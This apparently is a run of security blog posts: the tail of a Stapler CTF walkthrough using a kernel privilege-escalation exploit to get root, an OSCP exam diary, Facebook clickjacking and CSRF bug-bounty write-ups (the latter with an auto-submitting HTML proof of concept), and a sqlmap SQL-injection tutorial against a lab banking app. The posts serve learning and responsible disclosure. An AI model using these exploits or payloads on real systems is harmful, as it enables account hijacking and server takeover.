<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> .insns = (__aligned_u64) insns,</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ^</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> .license = (__aligned_u64)""</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ^</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett@red:~/ebpf_mapfd_doubleput_exploit$ ls -la</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">total 60</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-x--- 2 SHayslett SHayslett 4096 Jun 10 00:20 .</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 4 SHayslett SHayslett 4096 Jun 10 00:20 ..</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rwxr-x--- 1 SHayslett SHayslett 155 Apr 25 23:25 compile.sh</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rwxrwxr-x 1 SHayslett SHayslett 12328 Jun 10 00:20 doubleput</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r----- 1 SHayslett SHayslett 4188 Apr 25 23:25 doubleput.c</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rwxrwxr-x 1 SHayslett SHayslett 8020 Jun 10 00:20 hello</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r----- 1 SHayslett SHayslett 2186 Apr 25 23:25 hello.c</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rwxrwxr-x 1 SHayslett SHayslett 7516 Jun 10 00:20 suidhelper</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r----- 1 SHayslett SHayslett 255 Apr 25 23:25 suidhelper.c</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett@red:~/ebpf_mapfd_doubleput_exploit$ ./doubleput </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">starting writev</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">woohoo, got pointer reuse</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">suid file detected, launching rootshell...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">we have root privs now...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@red:~/ebpf_mapfd_doubleput_exploit# id</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">uid=0(root) gid=0(root) groups=0(root),1005(SHayslett)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@red:~/ebpf_mapfd_doubleput_exploit# </span><br />
<br />
And it just works !! Here is the flag.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@red:~/ebpf_mapfd_doubleput_exploit# cd /root</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@red:/root# ls -la</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">total 208</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwx------ 4 root root 4096 Jun 9 21:08 .</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 22 root root 4096 Jun 7 09:08 ..</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw------- 1 root root 1 Jun 5 19:44 .bash_history</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rwxr-xr-x 1 root root 1090 Jun 5 23:56 fix-wordpress.sh</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 root root 463 Jun 5 19:50 flag.txt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 root root 345 Jun 5 16:13 issue</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 root root 50 Jun 3 15:15 .my.cnf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw------- 1 root root 1 Jun 5 19:44 .mysql_history</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 11 root root 4096 Jun 3 15:42 .oh-my-zsh</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 root root 148 Aug 17 2015 .profile</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rwxr-xr-x 1 root root 103 Jun 5 18:14 python.sh</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw------- 1 root root 1024 Jun 5 17:33 .rnd</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 root root 4096 Jun 4 00:21 .vim</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw------- 1 root root 1 Jun 5 19:44 .viminfo</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 root root 54405 Jun 5 23:28 wordpress.sql</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 root root 39206 Jun 3 15:21 .zcompdump</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 root root 39352 Jun 3 15:42 .zcompdump-red-5.1.1</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw------- 1 root root 39 Jun 5 23:31 .zsh_history</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 root root 2839 Jun 3 15:42 .zshrc</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 root root 17 Jun 3 15:42 .zsh-update</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@red:/root# cat flag.txt </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">~~~~~~~~~~<(Congratulations)>~~~~~~~~~~</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> .-'''''-.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> |'-----'|</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> |-.....-|</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> | |</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> | |</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> _,._ | |</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> __.o` o`"-. | |</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> .-O o `"-.o O )_,._ | |</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">( o O o )--.-"`O o"-.`'-----'`</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> '--------' ( o O o) </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> `----------`</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">b6b545dc11b7a270f4bad23432190c75162c4a2b</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@red:/root# </span><br />
<br />
The readme of Stapler mentioned there are 2 ways to access to limited shell. The other one seems more interesting. I shall work on finding it and other ways of getting root.<br />
<br />
Hope you like this walkthrough !!</div>
AMol NAikhttp://www.blogger.com/profile/03701068634043898539noreply@blogger.com3tag:blogger.com,1999:blog-1544325078740292092.post-598289921730773162012-11-21T03:29:00.002-08:002012-11-21T04:39:14.006-08:00My Journey to OSCP<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
This all started when I enrolled for PWB, the most exciting course in network security. I had enough days to spend in lab but the pressure was to complete it in a months time. I started Lab from day 1. Lab was most exciting thing. It taught me "<b>Enumeration is the KEY</b>". Enumerate, enumerate & enumerate before exploitation.<br />
<br />
Lab was having approx 60 machines waiting to get pwned with different OS and vulnerabilities. I managed to get Lab Goal pwning all targets in the path.<br />
<br />
It was fun to get shell on server.<br />
<br />
Then the day arrived when i decided to take the challenge. I choose the slot from 11:30PM as I'm good at night. I took a good sleep a night before and during the day. I was bit relaxed and confident waiting for mail for exam setup.<br />
<br />
Ay 11:30PM, mail arrived with all necessary information for the exam. Looking at it, I feel confident and started my enumeration phase.<br />
<br />
Till 5:00AM, I managed to reach half way. Feel good. And then it happened. Next 10 hrs, no success. Sill at half-way mark. I started feeling frustration with decreasing confidence. Damn ... everything was perfect but something not working. :(<br />
<br />
At 1:00PM, I had lunch and started fresh with other targets since the last on was more painful. Bingo!! More success!! but still less.<br />
<br />
This has increased my confidence a little. Now I decided to head the painful target one more time. I had a backup plan in mind if this thing doesn't work for next 2 hr. My heart started beating fast n fast as time was running out.<br />
<br />
And it happened !! I managed to score more than the passing limit. Hush!! :)<br />
<br />
My well wishers encouraged me to go after 100pts, but I decided to stop here. This is mostly due to the stress I experienced in last 24hrs.<br />
<br />
There were moments during challenge when you see all things perfect but result is fail. I learned to keep eye on very small details which effectively contribute a big difference.<br />
<br />
During all these painful 30 days, my wife stood behind me and this certification would not be possible without her help and support. I thank you, my Love.<br />
<br />
I would like to thanks all my friends from <a href="http://www.garage4hackers.com/">garage4hackers</a>, especially <a href="http://www.garage4hackers.com/members/b0nd/">b0nd</a> for his suggestions and encouragements. Also I would like to thank "T.Basu" for support.<br />
<br />
Now I can proudly shout "<b>I'm OSCP</b>".<br />
<div>
<br /></div>
</div>
AMol NAikhttp://www.blogger.com/profile/03701068634043898539noreply@blogger.com14tag:blogger.com,1999:blog-1544325078740292092.post-36725575551489515892012-08-21T21:38:00.002-07:002012-08-22T12:35:12.108-07:00No XFO? It's time for Facebook Clickjacking<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
This post is the summary of the <a href="https://www.owasp.org/index.php/Clickjacking">clickjacking</a> bugs I reported for <a href="https://www.facebook.com/whitehat/bounty/">Facebook bug bounty program</a>. All these bugs discussed here are now fixed. Attacker was able to add any malicious facebook app with any permissions to victims account just by one click. Vulnerable pages discussed below were lacking Anti-Clickjacking Protection such as <a href="https://developer.mozilla.org/en-US/docs/The_X-FRAME-OPTIONS_response_header">X-Frame-Options</a> header which renders the vulnerable page in iframe (invisible).<br />
<br />
First bug I found was in <b>permissions.request</b> dialog on <a href="http://m.facebook.com/">Facebook Mobile</a> site. This dialog was used to add Facebook apps to authenticated user. A single click on "Allow" button would add the app to victim facebook profile.<br />
<br />
The vulnerable link, which adds "Graph API Explorer" app, was:<br />
<br />
<span style="background-color: #cccccc; font-family: Courier New, Courier, monospace;">http://m.facebook.com/dialog/permissions.request?app_id=145634995501895&display=wap&next=http%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fexplorer%2Fcallback&response_type=code&fbconnect=1</span><br />
<br />
Here "display" parameter was used to decide the apperance of the page based on values supplied. It has 3 values: page, wap & touch. Page display was mainly used in Facebook main site and wap & touch was for Facebook mobile site.<br />
<br />
The next bug was the variation of the previous bug where the <b>permissions.request</b> dialog page was able to render in iframe with "<b>display=wap</b>" parameter. With this parameter, the page looks like Mobile facebook page in Facebook main site which was lacking the clickjakcing protection at that time. The vulnerable page for this was:<br />
<br />
<span style="background-color: #cccccc; font-family: Courier New, Courier, monospace;">https://www.facebook.com/dialog/permissions.request?app_id=113556445341048&redirect_uri=http%3A%2F%2Fapps.facebook.com%2Fiastrology%2F%3Finstalled%3D1&display=wap&response_type=code&canvas=1&perms=user_birthday%2Cfriends_birthday%2Cemail</span><br />
<br />
Till this I learned new things about these dialogs and was able to add any <a href="https://developers.facebook.com/docs/authentication/permissions/">permissions</a> to the app.<br />
<br />
The last bug was about <a href="https://developers.facebook.com/docs/reference/dialogs/oauth/">oauth dialog</a>. This was again from Facebook Mobile site. The vulnerable page was:<br />
<br />
<span style="background-color: #cccccc; font-family: Courier New, Courier, monospace;">https://m.facebook.com/dialog/oauth?client_id=380424275310198&redirect_uri=http%3A%2F%2Fwlcm.info%2Fbday%2Fh%2Fmain.php&state=13629742989dab8ab4e9681582a6fb2c&scope=status_update%2Cpublish_stream%2Cuser_birthday&response_type=code</span><br />
<br />
Sadly this bug didn't win any bounty as Facebook said "<b>This can't be protected with X-Frame-Options because it needs to be servable in an arbitrary iframe.</b>".<br />
<br />
Well, I developed my own <a href="http://amolnaik4.blogspot.in/2011/12/presentation-make-profit-with-ui.html">process</a> to find such bugs which helps me to identify them quickly.<br />
<br />
All of these bugs will result in adding malicious app with unwanted permissions to victim's account only with single user click. These permissions includes access to email, status message and many other things.<br />
<br />
Here is a small demonstration:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/L49IixSoteI?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<br />
That's all. Hope you like this post. Suggessions, comments are welcome.<br />
<div>
<br /></div>
</div>
AMol NAikhttp://www.blogger.com/profile/03701068634043898539noreply@blogger.com1tag:blogger.com,1999:blog-1544325078740292092.post-40089821325026309322012-08-19T07:11:00.001-07:002012-08-19T07:12:07.055-07:00Facebook CSRF worth USD 5000<div dir="ltr" style="text-align: left;" trbidi="on">
This post is about a <a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)">Cross-Site Request Forgery (CSRF)</a> bug in Facebook I recently reported & now fixed. One fine day, when I logged into Facebook, I noticed a new feature "Appcenter". This feature allows you to choose apps you need. Game apps like Farmvilla are more popular.<br />
<br />
I was previously working on apps, so decided to give a shot to this new feature. The game apps, when clicked "Play Game" button, was generating a POST request.<br />
<br />
Example:<br />
<br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">POST /connect/uiserver.php HTTP/1.1</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">Host: www.facebook.com</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">Accept-Language: en-us,en;q=0.5</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">Accept-Encoding: gzip, deflate</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">Connection: keep-alive</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">Referer: https://www.facebook.com/appcenter/bubbleisland?fb_source=appcenter</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">Cookie: <user_cookies></span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">Content-Type: application/x-www-form-urlencoded</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">Content-Length: 800</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;"><br /></span>
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">fb_dtsg=AQA-UJ7c&perms=email%2Cpublish_actions&new_perms=ASLlW7IHiYKu-ZMcemoLEUlDlumPU0z7d0gOzKM5z2BfP1Z-zw8cdicB23IOy6AdtrbRYjH8aVKwjIfgWruVFWYpjz26INpaKwAQhsPclOtPvQ&orig_perms=ASKG-CjoMB7nJHLuWUICKb1rxAeU8wUcn7qi9rO2VwppP0UB1zJd7M4rZexK5spGmPrPbDPCHPaQBSKCGauSOx4pl-M-43-YbyP0Wxo9wmmsyQ&dubstep=1&new_user_session=1&grant_clicked=1&send_to_mobile_redirect_uri=https%3A%2F%2Fwww.facebook.com%2Fappcenter%2Fbubbleisland%3Ffb_source%3Dappcenter&app_id=124194560873&redirect_uri=https%3A%2F%2Fapps.facebook.com%2Fbubbleisland%2F%3Ffb_source%3Dappcenter%26fb_appcenter%3D1&app_center=1&is_paid_app=&app_center_ref=appcenter&response_type=none&from_post=1&__uiserv_method=permissions.request&grant_clicked=Play+Game&GdpEmailBucket_grantEmailType=contact_email&audience%5B501245709901917%5D%5Bvalue%5D=40</span><br />
<br />
<div>
There are many new parameters added in this new feature. Parameter 'fb_dtsg' is like token and 'perm' are the permissions required by the apps. Parameters 'redirect_url','app_id' are app specific values. Remaining parameters seems static except 'new_perms' & 'orig_perms'. I started to play with these two dynamic params and a<span style="background-color: white;">fter few attempts, I knew that these params no longer needed to add an app. </span></div>
<div>
<span style="background-color: white;"><br /></span></div>
<div>
Anti-CSRF tokens like 'fb_dtsg' supposed to get validated at server-side. I was shocked to see that in this new feature, somehow developer missed this point and it was possible to add app without 'fb_dtsg'. Bang!!<br />
<br />
Final PoC for this CSRF looks like this:<br />
<br />
<br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"><html></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"><head></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"></head></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"><body onload=document.forms[0].submit();></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"><form action="https://www.facebook.com/connect/uiserver.php" method="POST"></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"> <input type="hidden" name="perms" value="" /></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"> <input type="hidden" name="dubstep" value=1 /></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"> <input type="hidden" name="new_user_session" value=1 /></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"> <input type="hidden" name="grant_clicked" value=1 /></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"> <input type="hidden" name="send_to_mobile_redirect_uri" value="https%3A%2F%2Fwww.facebook.com%2Fappcenter%2Ftexas_holdem%3Ffb_source%3Dappcenter" /></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"> <input type="hidden" name="app_id" value="2389801228" /></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"> <input type="hidden" name="redirect_uri" value="https%3A%2F%2Fapps.facebook.com%2Ftexas_holdem%2F%3Ffb_source%3Dappcenter%26fb_appcenter%3D1" /></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"> <input type="hidden" name="app_center" value=1 /></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"> <input type="hidden" name="is_paid_app" value="" /></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"> <input type="hidden" name="app_center_ref" value="appcenter" /></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"> <input type="hidden" name="response_type" value="none" /></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"> <input type="hidden" name="from_post" value=1 /></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"> <input type="hidden" name="__uiserv_method" value="permissions.request" /></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"> <input type="hidden" name="grant_clicked" value="Play+Game" /></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"></form></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"></body></span><br />
<span style="background-color: #cccccc; color: #222222; font-family: Courier New, Courier, monospace;"></html></span></div>
<div>
<br /></div>
<div>
This functionality was used for other apps as well such as music apps, developers apps. Facebook Security team awarded this bug with $5000.</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<br /></div>
<div>
Facebook was pretty fast to address this issue and resolved this the next day itself. I'm very thankful to Facebook Security Team.</div>
</div>
AMol NAikhttp://www.blogger.com/profile/03701068634043898539noreply@blogger.com21tag:blogger.com,1999:blog-1544325078740292092.post-73166447303056701032012-05-24T14:07:00.000-07:002012-05-25T02:01:29.123-07:00SQLMap - Operating System Takeover - Windows<div dir="ltr" style="text-align: left;" trbidi="on">
Today I'm trying to use "OS takeover" feature of sqlmap. sqlmap can be used to get command shell using sql injection. sqlmap provides following options for OS level access:<br />
<br />
<div style="background-color: white; text-align: left;">
<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;"> Operating system access:</span></span></div>
<div style="background-color: white; text-align: left;">
<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;"> These options can be used to access the back-end database management</span></span></div>
<div style="background-color: white; text-align: left;">
<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;"> system underlying operating system</span></span></div>
<div style="background-color: white; text-align: left;">
<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;"> --os-cmd=OSCMD Execute an operating system command</span></span></div>
<div style="background-color: white; text-align: left;">
<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;"> --os-shell Prompt for an interactive operating system shell</span></span></div>
<div style="background-color: white; text-align: left;">
<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;"> --os-pwn Prompt for an out-of-band shell, meterpreter or VNC</span></span></div>
<div style="background-color: white; text-align: left;">
<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;"> --os-smbrelay One click prompt for an OOB shell, meterpreter or VNC</span></span></div>
<div style="background-color: white; text-align: left;">
<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;"> --os-bof Stored procedure buffer overflow exploitation</span></span></div>
<div style="background-color: white; text-align: left;">
<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;"> --priv-esc Database process' user privilege escalation</span></span></div>
<div style="background-color: white; text-align: left;">
<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;"> --msf-path=MSFPATH Local path where Metasploit Framework is installed</span></span></div>
<div style="background-color: white; text-align: left;">
<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;"> --tmp-path=TMPPATH Remote absolute path of temporary files directory</span></span></div>
<div style="text-align: left;">
<br />
sqlmap uses various methods to achieve operating system access based on database type. Please read sqlmap documentation for more information.<br />
<br />
The target I used for this is HackMe Bank from FoundStone installed on Windows XP machine (IP:192.168.1.4). HackMe Bank is a vulnerable application written in ASP.Net with MSSQL as backend database. The attacker machine is BackTrack5 (IP:192.168.1.3). Let's browse the target site.</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-EaAqoVqoSeg/T76cCRq-FLI/AAAAAAAAAlQ/8cvUncEuzJY/s1600/hackme-bank.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="http://2.bp.blogspot.com/-EaAqoVqoSeg/T76cCRq-FLI/AAAAAAAAAlQ/8cvUncEuzJY/s320/hackme-bank.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
Let's test basic SQL Injection by injecting single quote (') in username field of login page.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-v5WoDgjHcjY/T76cW_ukuBI/AAAAAAAAAlg/6wEqtCUeWDw/s1600/hackme-sqli.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="http://3.bp.blogspot.com/-v5WoDgjHcjY/T76cW_ukuBI/AAAAAAAAAlg/6wEqtCUeWDw/s320/hackme-sqli.png" width="320" /></a></div>
<br />
And the result is<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-F45HzIGQ9Xc/T76cZZ4WMkI/AAAAAAAAAlo/0gNAD3aZdBM/s1600/hackme-sqli1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="http://1.bp.blogspot.com/-F45HzIGQ9Xc/T76cZZ4WMkI/AAAAAAAAAlo/0gNAD3aZdBM/s320/hackme-sqli1.png" width="320" /></a></div>
<br />
"Username" field seems to be vulnerable to sql injection. Let's capture the Login request and feed it to sqlmap for further analysis. We can use -r option of sqlmap to provide POST request. The POST request looks like this:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace; font-size: x-small;">POST /HacmeBank_v2_Website/aspx/login.aspx HTTP/1.1<br />Host: 192.168.1.4<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: en-us,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: keep-alive<br />Referer: http://192.168.1.4/HacmeBank_v2_Website/aspx/login.aspx<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 210<br /><br />__VIEWSTATE=%2FwEPDwUJMzIyNTUyNzAyZGQX7Zm1%2Fne8qfz4FyjBx4QNynpGLw%3D%3D&txtUserName=asd&txtPassword=asd&btnSubmit=Submit&__EVENTVALIDATION=%2FwEWBAL6k9jHDwKl1bKzCQK1qbSRCwLCi9reA9W4eRmwDA5P7LP7g%2BMJe%2Fifr7tT</span><br />
<br />
<br />
Let's run sqlmap. I used --dbms=MSSQL and --technique=S (Stack Queries technique) to save time as I already know these details.<br />
<br />
<div style="text-align: left;">
<span style="font-family: "Courier New",Courier,monospace; font-size: x-small;">root@bt:/pentest/database/sqlmap# ./sqlmap.py -r hackme.txt -p txtUserName --dbms=MSSQL --technique=S<br /><br /> sqlmap/1.0-dev (r5068) - automatic SQL injection and database takeover tool<br /> http://www.sqlmap.org<br /><br />[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program<br /><br />[*] starting at 14:50:36<br /><br />[14:50:36] [INFO] parsing HTTP request from 'hackme.txt'<br />[14:50:36] [INFO] using '/pentest/database/sqlmap/output/192.168.1.4/session' as session file<br />[14:50:36] [INFO] testing connection to the target url<br />[14:50:37] [INFO] heuristics detected web page charset 'ascii'<br />[14:50:38] [WARNING] reflective value(s) found and filtering out<br />[14:50:38] [WARNING] heuristic test shows that POST parameter 'txtUserName' might not be injectable<br />[14:50:38] [INFO] testing sql injection on POST parameter 'txtUserName'<br />[14:50:38] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'<br />[14:50:38] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait.. <br />[14:51:00] [INFO] POST parameter 'txtUserName' is 'Microsoft SQL Server/Sybase stacked queries' injectable <br />[14:51:00] [INFO] checking if the injection point on POST parameter 'txtUserName' is a false positive<br />POST parameter 'txtUserName' is vulnerable. Do you want to keep testing the others (if any)? [y/N] <br />sqlmap identified the following injection points with a total of 18 HTTP(s) requests:<br />---<br />Place: POST<br />Parameter: txtUserName<br /> Type: stacked queries<br /> Title: Microsoft SQL Server/Sybase stacked queries<br /> Payload: __VIEWSTATE=/wEPDwUJMzIyNTUyNzAyZGQX7Zm1/ne8qfz4FyjBx4QNynpGLw==&txtUserName=asd'; WAITFOR DELAY '0:0:5';--&txtPassword=asd&btnSubmit=Submit&__EVENTVALIDATION=/wEWBAL6k9jHDwKl1bKzCQK1qbSRCwLCi9reA9W4eRmwDA5P7LP7g+MJe/ifr7tT<br />---<br /><br />[14:51:15] [INFO] testing Microsoft SQL Server<br />[14:51:15] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries<br />[14:51:20] [INFO] confirming Microsoft SQL Server<br />[14:51:30] [INFO] adjusting time delay to 2 seconds due to good response times<br />[14:51:30] [INFO] the back-end DBMS is Microsoft SQL Server<br />web server operating system: Windows XP<br />web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 5.1<br />back-end DBMS: Microsoft SQL Server 2005<br />[14:51:30] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.1.4'<br /><br />[*] shutting down at 14:51:30<br /><br />root@bt:/pentest/database/sqlmap#</span></div>
<br />
sqlmap has detected the injection and presented us the OS details and operating system details. You can go ahead and dig more details about databases, tables, columns, users, etc.<br />
<br />
<div style="text-align: left;">
<b>1. Option: --os-cmd=OSCMD</b></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
sqlmap executes a system command and will display the output. sqlmap will use "xp_cmdshell" for OS system access. I'll demonstrate "hostname" command:</div>
<br />
